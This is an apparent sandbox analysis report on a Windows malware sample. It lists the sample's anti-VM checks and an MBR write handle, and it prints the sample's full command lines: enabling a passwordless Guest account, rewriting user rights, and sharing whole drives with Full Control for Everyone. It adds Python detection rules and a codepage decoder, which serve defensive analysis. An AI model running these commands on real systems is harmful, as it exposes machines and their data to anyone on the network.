Analysis
- max time kernel: 117s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 26-05-2024 07:53

Static task: static1
Behavioral task: behavioral1
- Sample: f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe
- Resource: win10v2004-20240508-en

General
- Target: f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe
- Size: 3.3MB
- MD5: 51e442e27e653595685490dc7c7855a5
- SHA1: 35106601e646459da88b75c2b8058ebbf745f957
- SHA256: f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7
- SHA512: 95742561022003be9bfbdaa1e9c15d77d2b75273f9965174d819490d362c54eea358e99c5b94e09f5c41c1399caa893afea2f2e90ce9d6209611248f54cfc27d
- SSDEEP: 98304:NQOH5raw1GoHKqUifIwY/L4a3X62BcFOg/9MRhM6+baj:NH3BHKqUaS/LO2BM9MDMF
Malware Config
Signatures
(sample = f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe, PID 3020, in the tables below)

- Identifies VirtualBox via ACPI registry values (likely anti-VM)  [2 TTPs, 1 IoC]
  Process: sample
    Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
  VBOX__ is VirtualBox's default DSDT OEM identifier; a sandbox that leaves it unmasked hands the sample an easy VM tell.

- Checks BIOS information in registry  [2 TTPs, 2 IoCs]
  BIOS information is often read in order to detect sandboxing environments.
  Process: sample
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

- Checks whether UAC is enabled  [1 IoC]
  Process: sample
    Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

- Writes to the Master Boot Record (MBR)  [1 TTP, 1 IoC]
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  Process: sample
    File opened for modification: \??\PhysicalDrive0
  The IoC is a write-capable handle to the raw disk; the report records no write through it, so confirm or rule out the signature by comparing sector 0 of the sandbox disk before and after the run rather than treating the open alone as proof of a bootkit.

- Runs .reg file with regedit  [1 IoC]
  Process: regedit.exe (PID 2640)

- Runs net.exe

- Suspicious use of FindShellTrayWindow  [10 IoCs]
  Process: sample (PID 3020), 10 calls

- Suspicious use of SendNotifyMessage  [9 IoCs]
  Process: sample (PID 3020), 9 calls

- Suspicious use of SetWindowsHookEx  [2 IoCs]
  Process: sample (PID 3020), 2 calls

- Suspicious use of WriteProcessMemory  [64 IoCs]
  Source processes: sample, cmd.exe, net.exe (x6)
  Each parent-to-child pair appears four times in the raw log; listed once here with its count.
    PID 3020 (sample)      -> 2636 (cmd.exe)      x4
    PID 2636 (cmd.exe)     -> 1596 (net.exe)      x4
    PID 1596 (net.exe)     -> 1628 (net1.exe)     x4
    PID 2636 (cmd.exe)     -> 2120 (net.exe)      x4
    PID 2120 (net.exe)     -> 2656 (net1.exe)     x4
    PID 2636 (cmd.exe)     -> 2684 (SecEdit.exe)  x4
    PID 2636 (cmd.exe)     -> 2596 (net.exe)      x4
    PID 2596 (net.exe)     -> 2848 (net1.exe)     x4
    PID 2636 (cmd.exe)     -> 2092 (net.exe)      x4
    PID 2092 (net.exe)     -> 2716 (net1.exe)     x4
    PID 2636 (cmd.exe)     -> 2640 (regedit.exe)  x4
    PID 3020 (sample)      -> 2472 (net.exe)      x4
    PID 2472 (net.exe)     -> 2584 (net1.exe)     x4
    PID 3020 (sample)      -> 2612 (net.exe)      x4
    PID 2612 (net.exe)     -> 2680 (net1.exe)     x4
    PID 3020 (sample)      -> 2448 (net.exe)      x4
  The list stops at the 64-IoC cap (16 pairs x 4); the later children in the process tree (PIDs 2520, 2496, 2116, 2620, 2964 and 2252, plus their net1.exe children) are not covered by it.
Processes
Non-ASCII arguments below are GBK-encoded Chinese that the raw report rendered through the wrong codepage (Latin-1 in the process list, CP437 on the regedit line, so ¿ªÆô¹²Ïí.bat and ┐¬╞⌠╣▓╧φ.reg are the same eight bytes). They are shown decoded; translations: 开启共享 = "enable sharing", 本地（C盘) = "local (C drive)" (likewise D and F), 物理主机桌面 = "physical host desktop".

- C:\Users\Admin\AppData\Local\Temp\f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe  (PID 3020)
  command line: "C:\Users\Admin\AppData\Local\Temp\f5358c38641466c06cdd819a8f69eb93d208c3a9f222221cc7c6e0cf0ebbdfe7.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe  (PID 2636)
    command line: cmd /c C:\Users\Admin\AppData\Local\Temp\开启共享.bat
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe  (PID 1596)
      command line: NET USER Guest /active:yes
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe  (PID 1628)
        command line: C:\Windows\system32\net1 USER Guest /active:yes
    - C:\Windows\SysWOW64\net.exe  (PID 2120)
      command line: NET USER Guest /passwordreq:no
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe  (PID 2656)
        command line: C:\Windows\system32\net1 USER Guest /passwordreq:no
    - C:\Windows\SysWOW64\SecEdit.exe  (PID 2684)
      command line: Secedit /configure /cfg "security.inf" /db secsetup.sdb /areas USER_RIGHTS /verbose
    - C:\Windows\SysWOW64\net.exe  (PID 2596)
      command line: net user guest /active:yes
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe  (PID 2848)
        command line: C:\Windows\system32\net1 user guest /active:yes
    - C:\Windows\SysWOW64\net.exe  (PID 2092)
      command line: net user guest ""
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe  (PID 2716)
        command line: C:\Windows\system32\net1 user guest ""
    - C:\Windows\SysWOW64\regedit.exe  (PID 2640)
      command line: regedit /s 开启共享.reg
      - Runs .reg file with regedit
  - C:\Windows\SysWOW64\net.exe  (PID 2472)
    command line: net start workstation
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 2584)
      command line: C:\Windows\system32\net1 start workstation
  - C:\Windows\SysWOW64\net.exe  (PID 2612)
    command line: net start "Computer Browser"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 2680)
      command line: C:\Windows\system32\net1 start "Computer Browser"
  - C:\Windows\SysWOW64\net.exe  (PID 2448)
    command line: net start server
    - C:\Windows\SysWOW64\net1.exe  (PID 2488)
      command line: C:\Windows\system32\net1 start server
  - C:\Windows\SysWOW64\net.exe  (PID 2520)
    command line: net start netbios
    - C:\Windows\SysWOW64\net1.exe  (PID 2948)
      command line: C:\Windows\system32\net1 start netbios
  - C:\Windows\SysWOW64\net.exe  (PID 2496)
    command line: net share 本地（C盘)=C:\ /grant:Guests,full /grant:Everyone,full
    - C:\Windows\SysWOW64\net1.exe  (PID 2992)
      command line: C:\Windows\system32\net1 share 本地（C盘)=C:\ /grant:Guests,full /grant:Everyone,full
  - C:\Windows\SysWOW64\net.exe  (PID 2116)
    command line: net share 本地（D盘)=D:\ /grant:Guests,full /grant:Everyone,full
    - C:\Windows\SysWOW64\net1.exe  (PID 2924)
      command line: C:\Windows\system32\net1 share 本地（D盘)=D:\ /grant:Guests,full /grant:Everyone,full
  - C:\Windows\SysWOW64\net.exe  (PID 2620)
    command line: net share 本地（F盘)=F:\ /grant:Guests,full /grant:Everyone,full
    - C:\Windows\SysWOW64\net1.exe  (PID 2196)
      command line: C:\Windows\system32\net1 share 本地（F盘)=F:\ /grant:Guests,full /grant:Everyone,full
  - C:\Windows\SysWOW64\net.exe  (PID 2964)
    command line: net share 物理主机桌面=C:\Users\Admin\Desktop /grant:Guests,full /grant:Everyone,full
    - C:\Windows\SysWOW64\net1.exe  (PID 2904)
      command line: C:\Windows\system32\net1 share 物理主机桌面=C:\Users\Admin\Desktop /grant:Guests,full /grant:Everyone,full
  - C:\Windows\SysWOW64\cacls.exe  (PID 2252)
    command line: cacls C:\Users\Admin\Desktop /e /t /g everyone:F

Read as a whole: the dropped batch (children of cmd.exe) enables the built-in Guest account and removes its password, applies a user-rights template with secedit and imports a .reg file; neither security.inf nor the .reg file appears in the dropped-files list, so what they change is not visible in this report. The sample itself then starts the Workstation, Computer Browser, Server and NetBIOS services and publishes C:\, D:\, F:\ and the Admin desktop as SMB shares with Full Control for Guests and Everyone. The final cacls call grants Everyone Full Control on the desktop at the NTFS level, which is needed because share permissions do not loosen NTFS ACLs; remediation therefore has to remove the shares and that ACE, disable Guest again, and review the user-rights assignment secedit rewrote.
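The process tree above is the whole of this sample's visible behaviour, and every step of it is a plain command line. The Python below is an added example, not part of the sandbox report or of the sample: it runs a small set of command-line rules over a transcription of the tree (PIDs and command lines as listed above, with the Chinese names decoded from their GBK mojibake) and returns one finding per action. Rows for net.exe are skipped because net.exe hands the same arguments to net1.exe, which is also in the tree; counting both would double every action. The rule names, the `Finding` record and the `SAMPLE_TREE` transcription are this example's own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def _grants(cmd: str) -> str:
    """List every principal given full control on a 'net share' line."""
    return ", ".join(re.findall(r"/grant:([^,\s]+),full", cmd, re.I))


# (rule name, pattern over the command line, detail formatter(match, command line)).
# Rule names are this example's own labels, not sandbox signature names.
RULES = [
    ("batch-launch",
     re.compile(r"\bcmd(?:\.exe)?\s+/c\s+(?P<file>\S+\.bat)", re.I),
     lambda m, c: f"batch script run from {PureWindowsPath(m['file']).parent}"),
    ("account-enabled",
     re.compile(r"\bnet1?\s+user\s+(?P<acct>\S+)\s+/active:yes", re.I),
     lambda m, c: f"local account {m['acct']} activated"),
    ("blank-password",
     re.compile(r'\bnet1?\s+user\s+(?P<acct>\S+)\s+(?:""|/passwordreq:no)', re.I),
     lambda m, c: f"account {m['acct']}: password cleared or marked not required"),
    ("user-rights-policy",
     re.compile(r"\bsecedit\s+/configure\b.*?/areas\s+USER_RIGHTS", re.I),
     lambda m, c: "user-rights assignment rewritten from a supplied .inf template"),
    ("silent-reg-import",
     re.compile(r"\bregedit\s+/s\s+(?P<file>\S+)", re.I),
     lambda m, c: f"silent registry import of {m['file']}"),
    ("service-start",
     re.compile(r'\bnet1?\s+start\s+(?P<svc>"[^"]+"|\S+)', re.I),
     lambda m, c: f"service started: {m['svc']}"),
    ("share-everyone-full",
     re.compile(r"\bnet1?\s+share\s+(?P<name>[^=\s]+)=(?P<path>\S+).*?"
                r"/grant:(?:everyone|guests),full", re.I),
     lambda m, c: f"share {m['name']} -> {m['path']} with full control for {_grants(c)}"),
    ("ntfs-everyone-full",
     re.compile(r"\bcacls\s+(?P<path>\S+).*?/g\s+everyone:F", re.I),
     lambda m, c: f"NTFS Full Control granted to Everyone on {m['path']}"),
]


def triage(tree):
    """tree: iterable of (pid, image path, command line). net.exe only forwards its
    arguments to net1.exe, which appears in the tree with the same command line,
    so net.exe rows are skipped to count each action exactly once."""
    findings = []
    for pid, image, cmd in tree:
        if PureWindowsPath(image).name.lower() == "net.exe":
            continue
        for rule, pattern, fmt in RULES:
            m = pattern.search(cmd)
            if m:
                findings.append(Finding(pid, rule, fmt(m, cmd)))
    return findings


def summarize(findings):
    """Count findings per rule."""
    return Counter(f.rule for f in findings)


# Transcribed from the report's process tree (constructed input for this example);
# the net.exe parents of the net1.exe rows are mostly omitted since triage() skips them.
SYS = r"C:\Windows\SysWOW64"
N1 = r"C:\Windows\system32\net1"
SAMPLE_TREE = [
    (2636, SYS + r"\cmd.exe", r"cmd /c C:\Users\Admin\AppData\Local\Temp\开启共享.bat"),
    (1596, SYS + r"\net.exe", "NET USER Guest /active:yes"),
    (1628, SYS + r"\net1.exe", N1 + " USER Guest /active:yes"),
    (2656, SYS + r"\net1.exe", N1 + " USER Guest /passwordreq:no"),
    (2684, SYS + r"\SecEdit.exe",
     'Secedit /configure /cfg "security.inf" /db secsetup.sdb /areas USER_RIGHTS /verbose'),
    (2848, SYS + r"\net1.exe", N1 + " user guest /active:yes"),
    (2716, SYS + r"\net1.exe", N1 + ' user guest ""'),
    (2640, SYS + r"\regedit.exe", "regedit /s 开启共享.reg"),
    (2584, SYS + r"\net1.exe", N1 + " start workstation"),
    (2680, SYS + r"\net1.exe", N1 + ' start "Computer Browser"'),
    (2488, SYS + r"\net1.exe", N1 + " start server"),
    (2948, SYS + r"\net1.exe", N1 + " start netbios"),
    (2992, SYS + r"\net1.exe", N1 + r" share 本地（C盘)=C:\ /grant:Guests,full /grant:Everyone,full"),
    (2924, SYS + r"\net1.exe", N1 + r" share 本地（D盘)=D:\ /grant:Guests,full /grant:Everyone,full"),
    (2196, SYS + r"\net1.exe", N1 + r" share 本地（F盘)=F:\ /grant:Guests,full /grant:Everyone,full"),
    (2904, SYS + r"\net1.exe",
     N1 + r" share 物理主机桌面=C:\Users\Admin\Desktop /grant:Guests,full /grant:Everyone,full"),
    (2252, SYS + r"\cacls.exe", r"cacls C:\Users\Admin\Desktop /e /t /g everyone:F"),
]

if __name__ == "__main__":
    found = triage(SAMPLE_TREE)
    for f in found:
        print(f"{f.pid:>5}  {f.rule:<20}  {f.detail}")
    print(dict(summarize(found)))
```

Run stand-alone it prints sixteen findings, one per action in the tree. The share grants and the cacls grant are kept as separate rules on purpose: a share ACL and an NTFS ACL are independent controls, and cleanup has to revert both.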
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Temp\开启共享.bat  (name decoded from GBK; the raw report renders it as ¿ªÆô¹²Ïí.bat)
  Filesize: 242B
  MD5: 80f0e65f938e3259b19f89241858ae23
  SHA1: f6d463a58007cc20b70988563c49b3410e68e92b
  SHA256: 49b26f11aa955b7db4acc775b09476638525772c1a09e7c31dfdca19f6973dba
  SHA512: d51279e860cf401cba03c90d4edea4cfe408725b6a8737cfc3c63110f7f13f63f52ed350c2e79d1a287172d8c77d6a7dc658a1ac1d4867504a886aa108501d95
- \??\PIPE\lsarpc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (These are the digests of zero-length input: the lsarpc named pipe was captured empty, so the entry carries no data and its hashes are not usable as indicators.)
- memory/3020-0-0x0000000000400000-0x0000000000C6A000-memory.dmp   Filesize: 8.4MB
- memory/3020-2-0x0000000000400000-0x0000000000C6A000-memory.dmp   Filesize: 8.4MB
- memory/3020-4-0x0000000000400000-0x0000000000C6A000-memory.dmp   Filesize: 8.4MB
- memory/3020-3-0x0000000000400000-0x0000000000C6A000-memory.dmp   Filesize: 8.4MB
- memory/3020-18-0x0000000000400000-0x0000000000C6A000-memory.dmp  Filesize: 8.4MB
  (All five dumps cover the same mapped image region of PID 3020; the 8.4MB in-memory image is considerably larger than the 3.3MB file on disk.)
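The dropped .bat above and the .reg on the regedit line look like two different files in the raw report only because the same GBK bytes were rendered once as Latin-1 and once as CP437. The Python below is an added example, not part of the report or of the sample, showing how to recover such names: re-encode the displayed text with the codepage the viewer assumed (which returns the original bytes), decode those bytes as GBK, and keep only results that actually contain CJK characters. The candidate codepage list is this example's assumption; the `REPORT_STRINGS` inputs are copied from the raw report.

```python
"""Recover GBK-encoded names that a report rendered through the wrong codepage."""


def looks_chinese(text: str) -> bool:
    """True if at least one character is a CJK unified ideograph (ASCII may be mixed in)."""
    return any(0x4E00 <= ord(ch) <= 0x9FFF for ch in text)


def recover_gbk(shown: str, viewer_codepage: str) -> str:
    """Undo a mojibake: re-encoding the displayed characters with the codepage the
    viewer wrongly assumed gives back the original bytes, which are then decoded as GBK.
    Raises UnicodeError if the characters cannot have come from that codepage or the
    bytes are not valid GBK."""
    return shown.encode(viewer_codepage).decode("gbk")


def recover(shown: str, candidates=("latin-1", "cp437", "cp1252")) -> dict:
    """Try each plausible viewer codepage (assumed list); keep the decodings that
    round-trip to valid GBK and contain CJK text, keyed by the codepage that worked."""
    results = {}
    for cp in candidates:
        try:
            text = recover_gbk(shown, cp)
        except UnicodeError:
            continue  # not representable in this codepage, or not valid GBK afterwards
        if looks_chinese(text):
            results[cp] = text
    return results


def same_name(a: str, cp_a: str, b: str, cp_b: str) -> bool:
    """True if two differently rendered strings are the same underlying bytes."""
    return a.encode(cp_a) == b.encode(cp_b)


# Strings exactly as they appear in the raw report (constructed input for this example).
REPORT_STRINGS = {
    "bat name in process list": "¿ªÆô¹²Ïí",
    "reg name on regedit line": "┐¬╞⌠╣▓╧φ",
    "share name for C:": "±¾µØ£¨CÅÌ)",
    "share name for desktop": "ÎïÀíÖ÷»ú×ÀÃæ",
}

if __name__ == "__main__":
    for label, shown in REPORT_STRINGS.items():
        print(f"{label}: {shown!r} -> {recover(shown)}")
    print("bat and reg share a name:",
          same_name("¿ªÆô¹²Ïí", "latin-1", "┐¬╞⌠╣▓╧φ", "cp437"))
```

Latin-1 and cp1252 agree on every byte used here, so both are reported for the process-list strings; the CP437 rendering fails the Latin-1 attempt because box-drawing characters have no Latin-1 encoding, which is why trying several candidates and filtering on CJK content is more reliable than guessing one codepage.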